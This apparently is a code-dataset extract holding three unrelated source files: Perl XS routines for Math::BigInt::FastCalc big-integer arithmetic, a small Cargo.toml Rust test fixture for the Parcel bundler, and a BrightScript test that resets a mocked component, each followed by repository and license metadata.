ST(0) = sv_2mortal(newSViv(value)); \
XSRETURN(1);
#define RETURN_MORTAL_BOOL(temp, comp) \
ST(0) = sv_2mortal(boolSV( SvIV(temp) == comp));
#define CONSTANT_OBJ(int) \
RETVAL = newAV(); \
sv_2mortal((SV*)RETVAL); \
av_push (RETVAL, newSViv( int ));
void
_set_XS_BASE(BASE, BASE_LEN)
SV* BASE
SV* BASE_LEN
CODE:
XS_BASE = SvNV(BASE);
XS_BASE_LEN = SvIV(BASE_LEN);
##############################################################################
# _new
AV *
_new(class, x)
SV* x
INIT:
STRLEN len;
char* cur;
STRLEN part_len;
CODE:
/* create the array */
RETVAL = newAV();
sv_2mortal((SV*)RETVAL);
if (SvUOK(x) && SvUV(x) < XS_BASE)
{
/* shortcut for integer arguments */
av_push (RETVAL, newSVuv( SvUV(x) ));
}
else
{
/* split the input (as string) into XS_BASE_LEN long parts */
/* in perl:
[ reverse(unpack("a" . ($il % $BASE_LEN+1)
. ("a$BASE_LEN" x ($il / $BASE_LEN)), $_[1])) ];
*/
cur = SvPV(x, len); /* convert to string & store length */
cur += len; /* doing "cur = SvEND(x)" does not work! */
# process the string from the back
while (len > 0)
{
/* use either BASE_LEN or the amount of remaining digits */
part_len = (STRLEN) XS_BASE_LEN;
if (part_len > len)
{
part_len = len;
}
/* processed so many digits */
cur -= part_len;
len -= part_len;
/* printf ("part '%s' (part_len: %i, len: %i, BASE_LEN: %i)\n", cur, part_len, len, XS_BASE_LEN); */
if (part_len > 0)
{
av_push (RETVAL, newSVpvn(cur, part_len) );
}
}
}
OUTPUT:
RETVAL
##############################################################################
# _copy
void
_copy(class, x)
SV* x
INIT:
AV* a;
AV* a2;
I32 elems;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
a2 = (AV*)sv_2mortal((SV*)newAV());
av_extend (a2, elems); /* pre-padd */
while (elems >= 0)
{
/* av_store( a2, elems, newSVsv( (SV*)*av_fetch(a, elems, 0) ) ); */
/* looking and trying to preserve IV is actually slower when copying */
/* temp = (SV*)*av_fetch(a, elems, 0);
if (SvIOK(temp))
{
av_store( a2, elems, newSViv( SvIV( (SV*)*av_fetch(a, elems, 0) )));
}
else
{
av_store( a2, elems, newSVnv( SvNV( (SV*)*av_fetch(a, elems, 0) )));
}
*/
av_store( a2, elems, newSVnv( SvNV( (SV*)*av_fetch(a, elems, 0) )));
elems--;
}
ST(0) = sv_2mortal( newRV_inc((SV*) a2) );
##############################################################################
# __strip_zeros (also check for empty arrays from div)
void
__strip_zeros(x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
if (elems == -1)
{
av_push (a, newSViv(0)); /* correct empty arrays */
XSRETURN(1);
}
if (elems == 0)
{
XSRETURN(1); /* nothing to do since only one elem */
}
index = elems;
while (index > 0)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
if (SvNV(temp) != 0)
{
break;
}
index--;
}
if (index < elems)
{
index = elems - index;
while (index-- > 0)
{
av_pop (a);
}
}
XSRETURN(1);
##############################################################################
# decrement (subtract one)
void
_dec(class,x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
NV MAX;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
MAX = XS_BASE - 1;
index = 0;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
sv_setnv (temp, SvNV(temp)-1); /* decrement */
if (SvNV(temp) >= 0)
{
break; /* early out */
}
sv_setnv (temp, MAX); /* overflow, so set this to $MAX */
index++;
}
/* do have more than one element? */
/* (more than one because [0] should be kept as single-element) */
if (elems > 0)
{
temp = *av_fetch(a, elems, 0); /* fetch last element */
if (SvIV(temp) == 0) /* did last elem overflow? */
{
av_pop(a); /* yes, so shrink array */
/* aka remove leading zeros */
}
}
XSRETURN(1); /* return x */
##############################################################################
# increment (add one)
void
_inc(class,x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
NV BASE;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
BASE = XS_BASE;
index = 0;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
sv_setnv (temp, SvNV(temp)+1);
if (SvNV(temp) < BASE)
{
XSRETURN(1); /* return (early out) */
}
sv_setiv (temp, 0); /* overflow, so set this elem to 0 */
index++;
}
temp = *av_fetch(a, elems, 0); /* fetch last element */
if (SvIV(temp) == 0) /* did last elem overflow? */
{
av_push(a, newSViv(1)); /* yes, so extend array by 1 */
}
XSRETURN(1); /* return x */
##############################################################################
# Make a number (scalar int/float) from a BigInt object
void
_num(class,x)
SV* x
INIT:
AV* a;
NV fac;
SV* temp;
NV num;
I32 elems;
I32 index;
NV BASE;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
if (elems == 0) /* only one element? */
{
ST(0) = *av_fetch(a, 0, 0); /* fetch first (only) element */
XSRETURN(1); /* return it */
}
fac = 1.0; /* factor */
index = 0;
num = 0.0;
BASE = XS_BASE;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch current element */
num += fac * SvNV(temp);
fac *= BASE;
index++;
}
ST(0) = newSVnv(num);
##############################################################################
AV *
_zero(class)
CODE:
CONSTANT_OBJ(0)
OUTPUT:
RETVAL
##############################################################################
AV *
_one(class)
CODE:
CONSTANT_OBJ(1)
OUTPUT:
RETVAL
##############################################################################
AV *
_two(class)
CODE:
CONSTANT_OBJ(2)
OUTPUT:
RETVAL
##############################################################################
AV *
_ten(class)
CODE:
CONSTANT_OBJ(10)
OUTPUT:
RETVAL
##############################################################################
void
_is_even(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
temp = *av_fetch(a, 0, 0); /* fetch first element */
ST(0) = sv_2mortal(boolSV((SvIV(temp) & 1) == 0));
##############################################################################
void
_is_odd(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
temp = *av_fetch(a, 0, 0); /* fetch first element */
ST(0) = sv_2mortal(boolSV((SvIV(temp) & 1) != 0));
##############################################################################
void
_is_one(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '1' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 1);
##############################################################################
void
_is_two(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '2' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 2);
##############################################################################
void
_is_ten(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '10' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 10);
##############################################################################
void
_is_zero(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '0' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 0);
##############################################################################
void
_len(class,x)
SV* x
INIT:
AV* a;
SV* temp;
IV elems;
STRLEN len;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
temp = *av_fetch(a, elems, 0); /* fetch last element */
SvPV(temp, len); /* convert to string & store length */
len += (IV) XS_BASE_LEN * elems;
ST(0) = sv_2mortal(newSViv(len));
##############################################################################
void
_acmp(class, cx, cy);
SV* cx
SV* cy
INIT:
AV* array_x;
AV* array_y;
I32 elemsx, elemsy, diff;
SV* tempx;
SV* tempy;
STRLEN lenx;
STRLEN leny;
NV diff_nv;
I32 diff_str;
CODE:
array_x = (AV*)SvRV(cx); /* ref to aray, don't check ref */
array_y = (AV*)SvRV(cy); /* ref to aray, don't check ref */
elemsx = av_len(array_x);
elemsy = av_len(array_y);
diff = elemsx - elemsy; /* difference */
if (diff > 0)
{
RETURN_MORTAL_INT(1); /* len differs: X > Y */
}
else if (diff < 0)
{
RETURN_MORTAL_INT(-1); /* len differs: X < Y */
}
/* both have same number of elements, so check length of last element
and see if it differes */
tempx = *av_fetch(array_x, elemsx, 0); /* fetch last element */
tempy = *av_fetch(array_y, elemsx, 0); /* fetch last element */
SvPV(tempx, lenx); /* convert to string & store length */
SvPV(tempy, leny); /* convert to string & store length */
diff_str = (I32)lenx - (I32)leny;
if (diff_str > 0)
{
RETURN_MORTAL_INT(1); /* same len, but first elems differs in len */
}
if (diff_str < 0)
{
RETURN_MORTAL_INT(-1); /* same len, but first elems differs in len */
}
/* same number of digits, so need to make a full compare */
diff_nv = 0;
while (elemsx >= 0)
{
tempx = *av_fetch(array_x, elemsx, 0); /* fetch curr x element */
tempy = *av_fetch(array_y, elemsx, 0); /* fetch curr y element */
diff_nv = SvNV(tempx) - SvNV(tempy);
if (diff_nv != 0)
{
break;
}
elemsx--;
}
if (diff_nv > 0)
{
RETURN_MORTAL_INT(1);
}
if (diff_nv < 0)
{
RETURN_MORTAL_INT(-1);
}
ST(0) = sv_2mortal(newSViv(0)); /* X and Y are equal */
| XS | 5 | vlinhd11/vlinhd11-android-scripting | perl/src/ext/Math-BigInt-FastCalc/FastCalc.xs | [
"Apache-2.0"
] |
[package]
name = "cargo-test"
version = "0.1.0"
authors = ["josealbizures <albizures3601@gmail.com>"]
[dependencies]
[lib]
crate-type = ["cdylib"]
| TOML | 2 | johanberonius/parcel | packages/core/integration-tests/test/integration/rust-cargo/Cargo.toml | [
"MIT"
] |
sub Main()
mockComponentsHelper()
_brs_.resetMockComponent("ResetMocks_Testbed_2")
node = createObject("RoSGNode", "ResetMocks_Testbed")
node2 = createObject("RoSGNode", "ResetMocks_Testbed_2")
print node.foo ' => "fake testbed 1"
print node2.foo ' => "bar"
end sub
| Brightscript | 3 | lkipke/brs | test/e2e/resources/components/mocks/reset/resetMockComponent.brs | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.